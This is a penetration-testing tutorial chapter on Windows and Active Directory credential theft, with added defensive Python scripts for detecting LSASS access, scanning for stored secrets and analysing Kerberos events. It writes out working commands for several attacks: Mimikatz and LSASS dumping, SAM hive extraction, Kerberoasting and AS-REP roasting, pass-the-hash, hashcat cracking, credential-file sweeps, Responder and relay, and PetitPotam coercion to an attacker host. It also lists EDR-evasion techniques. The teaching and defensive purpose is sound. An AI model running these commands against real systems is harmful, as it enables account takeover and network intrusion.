Credential Access: Keys to the Kingdom
Credentials are the ultimate prize. With valid credentials, attackers don't need exploits—they just log in. This section covers how credentials are stolen from compromised systems.
Once you have credentials, see Lateral Movement for how to use them. For domain-specific attacks like Kerberoasting and DCSync in depth, see Active Directory Attacks. For network-based credential capture (LLMNR/NBT-NS poisoning), see Wireless & Network Attacks.
Why Credentials Matter
Initial access gets you one machine. Credentials get you everywhere that user can go—and often more.
Password Attacks
Cracking, spraying, stuffing, and harvesting credentials from memory and storage.
Token/Ticket Attacks
Pass-the-Hash, Pass-the-Ticket, Kerberoasting, and Golden Ticket attacks.
Credential Files
Browser passwords, config files, SSH keys, cloud credentials stored on disk.
Memory Extraction
LSASS dumps, process injection, Mimikatz for live credential capture.
Memory Credential Extraction
Windows stores credentials in memory for single sign-on convenience. The LSASS (Local Security Authority Subsystem Service) process contains plaintext passwords, NTLM hashes, and Kerberos tickets.
Mimikatz: The Swiss Army Knife
Mimikatz is the most powerful credential extraction tool. It reads credentials directly from LSASS memory and can perform various token manipulation attacks.
# Elevate to debug privileges
mimikatz # privilege::debug
Privilege '20' OK
# Dump all credentials from memory
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 12345678 (00000000:00bc614e)
Session : Interactive from 1
User Name : admin
Domain : CORP
Logon Server : DC01
msv :
[00000003] Primary
* Username : admin
* Domain : CORP
* NTLM : aad3b435b51404eeaad3b435b51404ee
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
wdigest :
* Username : admin
* Domain : CORP
* Password : SuperSecretP@ss!
kerberos :
* Username : admin
* Domain : CORP.LOCAL
* Password : SuperSecretP@ss!
On older systems (pre-Windows 8.1/2012R2), WDigest stored plaintext passwords in memory by default. On newer systems it's disabled but can be re-enabled by attackers via the registry key HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 1.
LSASS Dumping Techniques
If you can't run Mimikatz directly on the target, dump LSASS memory and analyze offline.
# Task Manager (GUI)
# Right-click lsass.exe → Create dump file
# ProcDump (Sysinternals - signed by Microsoft)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# comsvcs.dll (No external tools)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\temp\lsass.dmp full
# PowerShell (Out-Minidump)
Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump
# Mimikatz - Offline analysis
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
LSASS DUMP EVASION:
SIGNED TOOLS (Less suspicious):
├── ProcDump.exe (Sysinternals - Microsoft signed)
├── SQLDumper.exe (SQL Server component)
├── comsvcs.dll (Built into Windows)
└── Task Manager (GUI only)
DIRECT MEMORY ACCESS:
├── NtReadVirtualMemory API
├── MiniDumpWriteDump API
├── Snapshot + file copy
└── PPL bypass techniques
EDR EVASION:
├── Unhook NTDLL before dump
├── Direct syscalls
├── Handle duplication
├── Silent process exit (dump on crash)
└── Custom minidump implementation
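A defender's counterpart to the dumping techniques above, added here as an example (not code from the page or from any tool it names): triage of Sysmon Event ID 10 ProcessAccess records for handles opened to lsass.exe, keyed on the access mask, the source image and an unbacked call trace. The key="value" event rendering, the baseline allowlist and the sample events are all constructed.

```python
# Triage of Sysmon Event ID 10 (ProcessAccess) records for handles opened to lsass.exe.
# Input is a constructed key="value" rendering of the event fields; a real pipeline would
# pull the same fields from the Sysmon XML or the SIEM.
import re

PROCESS_VM_READ = 0x0010       # every memory-dumping technique needs this right
PROCESS_ALL_ACCESS = 0x1FFFFF  # what ProcDump-style tools typically request
# Processes that open lsass legitimately (constructed baseline; tune per estate).
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe",
                   r"c:\program files\windows defender\msmpeng.exe"}
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

def parse_event(line):
    """Turn one key="value" line into a dict of event fields."""
    return dict(FIELD_RE.findall(line))

def classify(ev):
    """Return the reasons this ProcessAccess event looks like credential dumping."""
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return []
    access = int(ev.get("GrantedAccess", "0x0"), 16)
    if not access & PROCESS_VM_READ:
        return []  # a handle that cannot read memory cannot dump credentials
    src = ev.get("SourceImage", "").lower()
    reasons = []
    if src not in ALLOWED_SOURCES:
        reasons.append("unexpected source image")
    if access == PROCESS_ALL_ACCESS:
        reasons.append("PROCESS_ALL_ACCESS requested")
    if "UNKNOWN" in ev.get("CallTrace", ""):
        reasons.append("call trace through unbacked memory (injected code / direct syscalls)")
    return reasons

def triage(lines):
    """Return [(SourceImage, reasons)] for every event an analyst should look at."""
    hits = []
    for ev in map(parse_event, lines):
        reasons = classify(ev)
        if reasons:
            hits.append((ev["SourceImage"], reasons))
    return hits

SAMPLE_EVENTS = [  # constructed sample telemetry, not from a real host
    r'SourceImage="C:\Windows\System32\csrss.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess="0x1000" CallTrace="C:\Windows\SYSTEM32\ntdll.dll+9d5a4"',
    r'SourceImage="C:\Program Files\Windows Defender\MsMpEng.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess="0x1010" CallTrace="C:\Windows\SYSTEM32\ntdll.dll+9d5a4"',
    r'SourceImage="C:\Users\bob\Downloads\procdump.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess="0x1FFFFF" CallTrace="C:\Windows\SYSTEM32\ntdll.dll+9d5a4|C:\Windows\System32\dbghelp.dll+2b3c1"',
    r'SourceImage="C:\Windows\System32\rundll32.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess="0x1FFFFF" CallTrace="C:\Windows\SYSTEM32\ntdll.dll+9d5a4|C:\Windows\System32\comsvcs.dll+1f3a2"',
    r'SourceImage="C:\Windows\System32\svchost.exe" TargetImage="C:\Windows\System32\lsass.exe" GrantedAccess="0x1010" CallTrace="C:\Windows\SYSTEM32\ntdll.dll+9d5a4|UNKNOWN(00000210abcd1234)"',
]
```

Running `triage(SAMPLE_EVENTS)` flags the procdump, rundll32 (comsvcs) and unbacked-svchost events and leaves the csrss and Defender handles alone.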
SAM & Registry Credentials
The Security Account Manager (SAM) database stores local account password hashes. Domain credentials are in NTDS.dit on domain controllers.
# Save registry hives (requires admin)
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
reg save HKLM\SECURITY security.hive
# Extract hashes with secretsdump (Impacket)
secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL
# Or use Volume Shadow Copy (VSS)
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
# Mimikatz from live system
mimikatz # lsadump::sam
mimikatz # lsadump::secrets
Kerberos Attacks
Kerberos is the default authentication protocol in Active Directory environments. Several attack techniques target Kerberos tickets and service accounts.
Kerberoasting
Service tickets for accounts with SPNs are encrypted with a key derived from the service account's password. Any domain user can request these tickets and crack them offline.
# Rubeus - Request service tickets
Rubeus.exe kerberoast /outfile:hashes.txt
# Impacket - GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.1 corp.local/user:password
# PowerView
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash
# Crack with Hashcat
hashcat -m 13100 hashes.txt wordlist.txt
# Crack with John
john --format=krb5tgs hashes.txt --wordlist=wordlist.txt
AS-REP Roasting
Accounts that do not require Kerberos pre-authentication return an AS-REP that can be cracked offline. Look for accounts with "Do not require Kerberos preauthentication" set.
# Find vulnerable accounts
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true}
# Rubeus
Rubeus.exe asreproast /outfile:asrep.txt
# Impacket (no creds needed!)
GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt
# Crack
hashcat -m 18200 asrep.txt wordlist.txt
Pass-the-Hash / Pass-the-Ticket
CREDENTIAL REUSE ATTACKS:
PASS-THE-HASH (PtH):
├── Use NTLM hash instead of password
├── Works with SMB, WinRM, WMI, etc.
├── Tools: mimikatz, pth-winexe, CrackMapExec
└── Example: pth-winexe -U admin%hash //target cmd.exe
PASS-THE-TICKET (PtT):
├── Inject Kerberos ticket into session
├── Access resources as that user
├── Tools: Mimikatz, Rubeus
└── mimikatz # kerberos::ptt ticket.kirbi
OVERPASS-THE-HASH:
├── Use NTLM hash to request Kerberos ticket
├── Avoids NTLM-specific detections
├── mimikatz # sekurlsa::pth /user:admin /domain:corp /ntlm:hash
└── Results in legitimate Kerberos authentication
Password Cracking
Once you have hashes, crack them offline using GPU-accelerated tools.
# Common hash types
hashcat -m 1000 ntlm.txt wordlist.txt # NTLM
hashcat -m 3000 lm.txt wordlist.txt # LM (legacy)
hashcat -m 5600 netntlmv2.txt wordlist.txt # NetNTLMv2
hashcat -m 13100 kerberoast.txt wordlist.txt # Kerberoast
hashcat -m 18200 asrep.txt wordlist.txt # AS-REP
# Attack modes
hashcat -a 0 hash.txt wordlist.txt # Dictionary
hashcat -a 3 hash.txt ?a?a?a?a?a?a # Brute force
hashcat -a 6 hash.txt wordlist.txt ?d?d?d?d # Hybrid
# Rules for variations
hashcat -m 1000 hash.txt wordlist.txt -r rules/best64.rule
# Show cracked passwords
hashcat -m 1000 hash.txt --show
CRACKING STRATEGY:
QUICK WINS:
├── Known weak passwords (Password1!, Summer2024)
├── Company name variations
├── Common patterns + years
├── Previous breach data
└── Top 10000 passwords
RULE-BASED:
├── best64.rule - Common transformations
├── d3ad0ne.rule - Aggressive mutations
├── OneRuleToRuleThemAll - Comprehensive
└── Custom rules for target
WORDLISTS:
├── rockyou.txt (14M passwords)
├── SecLists (various)
├── CrackStation (15GB)
├── Company-specific (scrape website)
└── Previously cracked passwords
Credential Files
Credentials are often stored in files throughout the system - browsers, config files, scripts, and cloud provider settings.
# Browser credentials (use tools like SharpChromium)
SharpChromium.exe logins
SharpWeb.exe all
# Common credential locations
dir /s /b *password* *credential* *secret* *.config 2>nul
findstr /si password *.xml *.ini *.txt *.config
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
# SSH keys
dir /s /b id_rsa* id_dsa* id_ecdsa* id_ed25519* 2>nul
# Cloud credentials
type %USERPROFILE%\.aws\credentials
type %USERPROFILE%\.azure\accessTokens.json
# Git credentials
type %USERPROFILE%\.git-credentials
git config --list
HIGH-VALUE CREDENTIAL LOCATIONS:
WINDOWS:
├── unattend.xml (deployment passwords)
├── web.config (connection strings)
├── Groups.xml (GPP passwords - CVE-2014-1812)
├── *.rdp files (saved credentials)
├── WinSCP.ini / PuTTY sessions
├── KeePass databases (*.kdbx)
└── Credential Manager (vaultcmd)
LINUX:
├── /etc/shadow (user hashes)
├── ~/.bash_history (commands with passwords)
├── ~/.ssh/* (private keys)
├── /var/log/* (logged passwords)
├── .env files (API keys)
├── wp-config.php (database creds)
└── /home/*/.aws/credentials
BROWSERS:
├── Chrome: Login Data (SQLite)
├── Firefox: logins.json + key4.db
├── Edge: Login Data (Chromium-based)
└── IE: Credential Manager
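An added audit example (not from the page or its tools) for the stored-credential locations listed above: it materialises constructed samples of web.config, .env, unattend.xml, Groups.xml and .git-credentials in a temporary directory, scans them with the kind of patterns a secret scanner uses, and reports each hit with the value redacted so the file can be cleaned up before an attacker's findstr sweep reaches it. File contents, paths and every value in them are constructed, not real secrets.

```python
# Audit of the stored-credential locations listed above: find secrets in config files and
# report them redacted, so they can be removed before an attacker's findstr sweep finds them.
import os
import re
import tempfile

PATTERNS = {  # kind -> regex whose single capture group is the secret itself
    "connection-string password": re.compile(r'''(?i)password=([^;"']+)'''),
    "AWS access key id": re.compile(r"\b(AKIA[0-9A-Z]{16})\b"),
    "unattend.xml password": re.compile(r"(?is)<Password>\s*<Value>([^<]+)</Value>"),
    "GPP cpassword": re.compile(r'cpassword="([^"]+)"'),
    "git credential URL": re.compile(r"https?://[^:/\s]+:([^@\s]+)@"),
}

def redact(secret):
    """Keep just enough of the value for a reviewer to confirm the finding."""
    return secret[:2] + "*" * (len(secret) - 4) + secret[-2:] if len(secret) > 4 else "****"

def scan_text(path, text):
    """Return (path, kind, redacted_value) for every pattern hit in text."""
    hits = []
    for kind, rx in PATTERNS.items():
        for m in rx.finditer(text):
            hits.append((path, kind, redact(m.group(1))))
    return hits

def scan_tree(root):
    """Walk a directory tree, scanning every file and reporting paths relative to root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_text(os.path.relpath(path, root).replace(os.sep, "/"), fh.read()))
    return findings

SAMPLE_FILES = {  # constructed examples of the file types discussed; the values are fake
    "inetpub/web.config": '<add name="db" connectionString="Server=sql01;User Id=app;Password=Winter2024!;" />',
    "app/.env": "DB_HOST=localhost\nAWS_ACCESS_KEY_ID=AKIAEXAMPLEEXAMPLE01\n",
    "sysprep/unattend.xml": "<AutoLogon><Password><Value>UABhAHMAcwB3AG8AcgBkAA==</Value></Password></AutoLogon>",
    "Policies/Groups.xml": '<User name="helpdesk" cpassword="constructedGppBlob==" />',
    "home/.git-credentials": "https://deploy:ghp_constructedtoken@github.example\n",
}

def build_and_scan():
    """Materialise the sample files in a temp directory and scan them."""
    root = tempfile.mkdtemp()
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return sorted(scan_tree(root))
```

Point `scan_tree` at a real directory to audit it; the same redaction keeps the report itself from becoming a credential file.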
Network Credential Capture
Intercept credentials on the wire using MITM attacks and protocol weaknesses.
# Start Responder to capture NetNTLMv2 hashes
sudo responder -I eth0 -wrf
# Captured hashes appear as:
# [SMB] NTLMv2-SSP Hash : CORP\admin::CORP:1122334455667788:...
# Relay instead of capture (ntlmrelayx)
sudo ntlmrelayx.py -tf targets.txt -smb2support
# Force authentication with various coercion methods
# PetitPotam, PrinterBug, etc.
python3 PetitPotam.py attacker_ip dc_ip
For comprehensive coverage of LLMNR/NBT-NS poisoning, ARP spoofing, and NTLM relay attacks, see the Wireless & Network Attacks chapter.
Detection & Defense
Credential theft is often the turning point in an attack. Strong defenses here can stop attackers from expanding access.
CREDENTIAL THEFT DETECTION:
LSASS ACCESS:
├── Sysmon Event ID 10 (ProcessAccess to lsass.exe)
├── Windows Defender Credential Guard alerts
├── EDR detection of Mimikatz signatures
├── Unusual processes accessing lsass
└── Minidump file creation in temp folders
KERBEROS ATTACKS:
├── Event ID 4769 - TGS requests (Kerberoasting)
├── Event ID 4768 - AS-REQ without preauth (AS-REP)
├── High volume ticket requests from single source
├── RC4 encryption in Kerberos (downgrade)
└── Service ticket requests for sensitive SPNs
NETWORK CAPTURE:
├── LLMNR/NBT-NS traffic (should be disabled)
├── Responder-like behavior on network
├── SMB connections to unexpected hosts
├── NTLM authentication where Kerberos expected
└── Authentication to attacker-controlled hosts
CREDENTIAL FILE ACCESS:
├── Access to SAM/SYSTEM/SECURITY hives
├── VSS snapshot creation
├── Browser credential file access
├── Mass file searches for passwords
└── Registry queries for cached credentials
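Added example (not from the page or the tools it names) of the Kerberos indicators in the detection list above, run over constructed Security events 4768 and 4769: AS-REQs without pre-authentication, RC4 (0x17) ticket encryption, and one principal requesting many distinct SPNs. The event dicts, account names, addresses and the burst threshold are constructed.

```python
# Analysis of Windows Security events 4768 (TGT request) and 4769 (service ticket request)
# for the Kerberos indicators in the detection list above: AS-REQs without pre-authentication,
# RC4 (0x17) ticket encryption, and one principal requesting many distinct SPNs.
# Events are constructed dicts carrying the field names the real events use.
from collections import defaultdict

RC4_HMAC = "0x17"          # etype 23; an AES-capable domain should rarely see it
SPN_BURST_THRESHOLD = 5    # distinct services per (account, source IP); tune per estate

def is_machine_or_krbtgt(service):
    """Computer accounts (trailing $) and krbtgt are not Kerberoasting targets."""
    return service.endswith("$") or service.lower() == "krbtgt"

def analyse(events):
    """Return (severity, account, source_ip, detail) findings for the given events."""
    findings = []
    services = defaultdict(set)  # (account, ip) -> distinct SPNs requested
    for ev in events:
        acct, ip, etype = ev["TargetUserName"], ev["IpAddress"], ev["TicketEncryptionType"]
        if ev["EventID"] == "4768":
            # a successful TGT issued with no pre-auth means the account is roastable
            if ev.get("PreAuthType") == "0" and ev.get("Status", "0x0") == "0x0":
                findings.append(("high", acct, ip, "AS-REQ without pre-authentication (AS-REP roasting)"))
            if etype == RC4_HMAC:
                findings.append(("medium", acct, ip, "RC4 TGT requested (overpass-the-hash or downgrade)"))
        elif ev["EventID"] == "4769":
            svc = ev["ServiceName"]
            if is_machine_or_krbtgt(svc):
                continue
            services[(acct, ip)].add(svc)
            if etype == RC4_HMAC:
                findings.append(("medium", acct, ip, f"RC4 service ticket for {svc} (Kerberoasting)"))
    for (acct, ip), spns in services.items():
        if len(spns) >= SPN_BURST_THRESHOLD:
            findings.append(("high", acct, ip, f"{len(spns)} distinct SPNs requested from one source"))
    return findings

SAMPLE_EVENTS = [  # constructed sample events, not real telemetry
    {"EventID": "4768", "TargetUserName": "alice", "IpAddress": "10.10.10.50", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
    {"EventID": "4768", "TargetUserName": "svc_legacy", "IpAddress": "10.10.10.99", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    {"EventID": "4768", "TargetUserName": "admin", "IpAddress": "10.10.10.99", "PreAuthType": "2", "TicketEncryptionType": "0x17"},
    {"EventID": "4769", "TargetUserName": "alice", "IpAddress": "10.10.10.50", "ServiceName": "WEB01$", "TicketEncryptionType": "0x12"},
] + [
    {"EventID": "4769", "TargetUserName": "bob", "IpAddress": "10.10.10.77", "ServiceName": svc, "TicketEncryptionType": "0x17"}
    for svc in ("svc_sql", "svc_http", "svc_backup", "svc_sharepoint", "svc_iis", "svc_exchange")
]
```

On the sample, `analyse(SAMPLE_EVENTS)` yields nothing for alice, one high and one medium finding for svc_legacy, one medium for admin, and six RC4 service-ticket findings plus a burst finding for bob.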
CREDENTIAL THEFT PREVENTION:
MEMORY PROTECTION:
├── Enable Credential Guard (Windows 10/Server 2016+)
├── Protected Users security group
├── LSA Protection (RunAsPPL)
├── Disable WDigest authentication
└── Disable NTLM where possible
PASSWORD POLICY:
├── Long passwords (15+ chars) or passphrases
├── MFA for privileged accounts
├── Managed Service Accounts (MSA/gMSA)
├── Regular password rotation for service accounts
└── Different passwords per system (LAPS)
NETWORK HARDENING:
├── Disable LLMNR and NBT-NS
├── Enable SMB signing
├── Require Kerberos (disable NTLMv1)
├── Network segmentation
└── Privileged Access Workstations (PAW)
MONITORING:
├── Honey accounts (fake high-value targets)
├── Canary credentials in files
├── Alert on use of cached credentials
├── Monitor for credential dumping tools
└── Track authentication anomalies
Tools Reference
Mimikatz
Windows credential extraction. Memory dumps, pass-the-hash, golden tickets.
Rubeus
Kerberos abuse toolkit. Kerberoasting, AS-REP roasting, ticket manipulation.
Impacket
Python tools for network protocols. secretsdump, GetUserSPNs, ntlmrelayx.
Hashcat
GPU-accelerated password cracking. Supports hundreds of hash types.
Responder
LLMNR/NBT-NS/mDNS poisoner. Captures NetNTLM hashes on the network.
CrackMapExec
Swiss army knife for pentesting Windows/AD. Credential spraying, execution.
MITRE ATT&CK Mapping
T1003.001
LSASS Memory - Extracting credentials from LSASS process
T1003.002
SAM - Security Account Manager dump
T1558.003
Kerberoasting - Requesting service tickets to crack offline
T1558.004
AS-REP Roasting - Targeting accounts without preauth
T1550.002
Pass-the-Hash - Authenticating with NTLM hash
T1557.001
LLMNR/NBT-NS Poisoning - Network credential interception